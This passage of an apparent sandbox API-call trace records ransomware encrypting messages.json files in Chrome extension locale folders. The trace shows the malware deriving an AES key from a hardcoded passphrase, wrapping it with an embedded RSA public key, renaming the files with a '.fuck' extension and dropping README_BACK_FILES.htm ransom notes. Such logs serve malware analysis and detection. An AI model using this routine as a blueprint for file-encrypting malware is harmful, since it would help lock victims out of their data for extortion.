data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.fuck")) returned 1 [0250.842] CryptDestroyHash (hHash=0x2985f20) returned 1 [0250.842] CryptDestroyKey (hKey=0x2985a20) returned 1 [0250.842] CryptReleaseContext (hProv=0x2989270, dwFlags=0x0) returned 1 [0250.842] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.842] FindClose (in: hFindFile=0x2985ea0 | out: hFindFile=0x2985ea0) returned 1 [0250.842] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\readme_back_files.htm")) returned 0xffffffff [0250.842] AreFileApisANSI () returned 1 [0250.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.842] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.843] GetFileType (hFile=0x5d5c) returned 0x1 [0250.843] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.844] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.844] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ea0 [0250.845] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.845] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.845] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.845] GetLastError () returned 0x0 [0250.845] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json")) returned 0x20 [0250.846] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json", dwFileAttributes=0x80) returned 1 [0250.846] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0250.847] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0250.847] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.847] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2989270) returned 1 [0250.849] CryptCreateHash (in: hProv=0x2989270, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.849] lstrlenA (lpString="YpinUbJDdIEgxfEoLIcGdepQzMlQm") returned 29 [0250.849] CryptHashData (hHash=0x2985f20, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.849] CryptDeriveKey (in: hProv=0x2989270, Algid=0x6610, hBaseData=0x2985f20, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985a20) returned 1 [0250.849] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.849] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.849] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2989b78) returned 1 [0250.850] CryptImportPublicKeyInfo (in: hCryptProv=0x2989b78, dwCertEncodingType=0x1, pInfo=0x29926a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29926d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29926d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29840a0) returned 1 [0250.850] CryptEncrypt (in: hKey=0x29840a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.850] CryptEncrypt (in: hKey=0x29840a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298a2e8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298a2e8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.850] WriteFile (in: hFile=0x5d64, lpBuffer=0x298a2e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298a2e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.851] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x161, lpOverlapped=0x0) returned 1 [0250.852] CryptEncrypt (in: hKey=0x2985a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x161, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x170) returned 1 [0250.852] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x170, lpOverlapped=0x0) returned 1 [0250.852] CloseHandle (hObject=0x5d60) returned 1 [0250.852] CloseHandle (hObject=0x5d64) returned 1 [0250.853] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json"), bFailIfExists=0) returned 1 [0250.857] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json", dwFileAttributes=0x0) returned 1 [0250.857] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.gsg")) returned 1 [0250.858] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.fuck")) returned 1 [0250.859] CryptDestroyHash (hHash=0x2985f20) returned 1 [0250.859] CryptDestroyKey (hKey=0x2985a20) returned 1 [0250.859] CryptReleaseContext (hProv=0x2989270, dwFlags=0x0) returned 1 [0250.859] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.859] FindClose (in: hFindFile=0x2985ea0 | out: hFindFile=0x2985ea0) returned 1 [0250.859] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\readme_back_files.htm")) returned 0xffffffff [0250.859] AreFileApisANSI () returned 1 [0250.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.859] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.860] GetFileType (hFile=0x5d5c) returned 0x1 [0250.860] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.861] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.861] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ea0 [0250.861] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.861] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.862] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.862] GetLastError () returned 0x0 [0250.862] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json")) returned 0x20 [0250.862] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json", dwFileAttributes=0x80) returned 1 [0250.862] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0250.863] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0250.864] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.864] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2989270) returned 1 [0250.867] CryptCreateHash (in: hProv=0x2989270, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.867] lstrlenA (lpString="YpinUbJDdIEgxfEoLIcGdepQzMlQm") returned 29 [0250.867] CryptHashData (hHash=0x2985f20, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.867] CryptDeriveKey (in: hProv=0x2989270, Algid=0x6610, hBaseData=0x2985f20, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985ba0) returned 1 [0250.867] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.867] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.867] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2989490) returned 1 [0250.867] CryptImportPublicKeyInfo (in: hCryptProv=0x2989490, dwCertEncodingType=0x1, pInfo=0x2991f50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2991f80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2991f88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984660) returned 1 [0250.868] CryptEncrypt (in: hKey=0x2984660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.868] CryptEncrypt (in: hKey=0x2984660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298a370*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298a370*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.868] WriteFile (in: hFile=0x5d60, lpBuffer=0x298a370*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298a370*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.869] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x117, lpOverlapped=0x0) returned 1 [0250.870] CryptEncrypt (in: hKey=0x2985ba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x117, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0250.870] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0250.871] CloseHandle (hObject=0x5d64) returned 1 [0250.871] CloseHandle (hObject=0x5d60) returned 1 [0250.871] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json"), bFailIfExists=0) returned 1 [0250.874] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json", dwFileAttributes=0x0) returned 1 [0250.874] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.gsg")) returned 1 [0250.877] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.fuck")) returned 1 [0250.878] CryptDestroyHash (hHash=0x2985f20) returned 1 [0250.878] CryptDestroyKey (hKey=0x2985ba0) returned 1 [0250.878] CryptReleaseContext (hProv=0x2989270, dwFlags=0x0) returned 1 [0250.878] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.878] FindClose (in: hFindFile=0x2985ea0 | out: hFindFile=0x2985ea0) returned 1 [0250.878] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\readme_back_files.htm")) returned 0xffffffff [0250.879] AreFileApisANSI () returned 1 [0250.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.879] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.879] GetFileType (hFile=0x5d5c) returned 0x1 [0250.879] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.881] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.881] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985f20 [0250.881] FindNextFileA (in: hFindFile=0x2985f20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.881] FindNextFileA (in: hFindFile=0x2985f20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.881] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.882] GetLastError () returned 0x0 [0250.882] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json")) returned 0x20 [0250.882] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json", dwFileAttributes=0x80) returned 1 [0250.882] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0250.883] CreateFileA 